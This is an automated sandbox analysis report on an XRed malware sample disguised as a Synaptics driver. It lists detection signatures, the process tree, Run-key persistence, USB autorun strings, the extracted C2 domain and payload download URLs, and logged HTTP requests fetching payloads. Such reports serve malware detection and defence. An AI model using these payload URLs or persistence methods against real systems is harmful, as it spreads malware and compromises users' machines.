Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583475
MD5:eaba5b2c3b6607177112ec5f26438ba3
SHA1:d0572bad54faca6af612763c6835feb160a3dcd2
SHA256:43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
Tags:exeuser-jstrosch
Infos:

Detection

XRed
Score:74
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
Writes many files with high entropy
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EABA5B2C3B6607177112EC5F26438BA3)
    • ._cache_file.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: FD6057B33E15A553DDC5D9873723CE8F)
      • dxwsetup.exe (PID: 7372 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe MD5: EAA6B5EE297982A6A396354814006761)
    • Synaptics.exe (PID: 7364 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • EXCEL.EXE (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8016 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • Synaptics.exe (PID: 8188 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XRedYara detected XRedJoe Security
    file.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Synaptics\RCXE9B.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCXE9B.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\BJZFPPWAPT\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\BJZFPPWAPT\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Process Memory Space: file.exe PID: 7252JoeSecurity_XRedYara detected XRedJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.file.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                        0.0.file.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7252, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                          Sigma detected: Office Macro File Creation
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Local\Temp\r4UZcR9I.xlsm

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-02T20:38:52.933059+010020448871A Network Trojan was detected192.168.2.550021142.250.184.238443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-02T20:37:53.589740+010028326171Malware Command and Control Activity Detected192.168.2.54971069.42.215.25280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCXE9B.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\RCXE9B.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Found malware configuration
                          Source: file.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCXE9B.tmpReversingLabs: Detection: 93%
                          Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1ReversingLabs: Detection: 93%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 92%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.8% probability
                          Machine Learning detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCXE9B.tmpJoe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Joe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50021 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:50022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50027 version: TLS 1.2
                          Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
                          Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043761767.0000000000D91000.00000020.00000001.01000000.00000007.sdmp
                          Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: z:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: x:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: v:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: t:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: r:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: p:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: n:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: l:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: j:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: h:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: f:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: b:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: y:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: w:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: u:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: s:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: q:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: o:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: m:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: k:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: i:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: g:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: e:Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile opened: c:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: a:Jump to behavior
                          Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                          Source: file.exeBinary or memory string: [autorun]
                          Source: file.exeBinary or memory string: [autorun]
                          Source: file.exeBinary or memory string: autorun.inf
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49710 -> 69.42.215.252:80
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:50021 -> 142.250.184.238:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: xred.mooo.com
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: freedns.afraid.org
                          Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                          Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                          Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                          Source: global trafficDNS traffic detected: DNS query: docs.google.com
                          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5J2wcYuTkX-xkQT8FSKqGHktGrzCtpgjVhmKpHsBNkyL4wZjkxiFYFAAAXhYAcuOMjHRMwmuIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:53 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6t4U7rP3YozBkUnFONUWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I; expires=Fri, 04-Jul-2025 19:38:53 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6A28wtMAypMUfN65dy_3-vAh4CsIODc516Ohuug12TEwPqshOxGb5qediKdLFaray1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-NYOikIDt8jRF7wIiCKzr-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4nIj-xFHayWQlLPQMIEN6VRTOWSws6WCBYkU9pKfPjOxbD7UolSx0sYbijBEYaJvdPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-yednUhlFkoA8wB6tRtwLSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: file.exeString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W%
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978n%
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978q
                          Source: Synaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                          Source: dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.BetaPlace.com
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.BetaPlace.com.?
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.BetaPlace.comEContinuare
                          Source: dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.betaplace.com
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2045818625.0000000000C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.betaplace.com.
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.betaplace.com.DInstalacn
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                          Source: file.exeString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
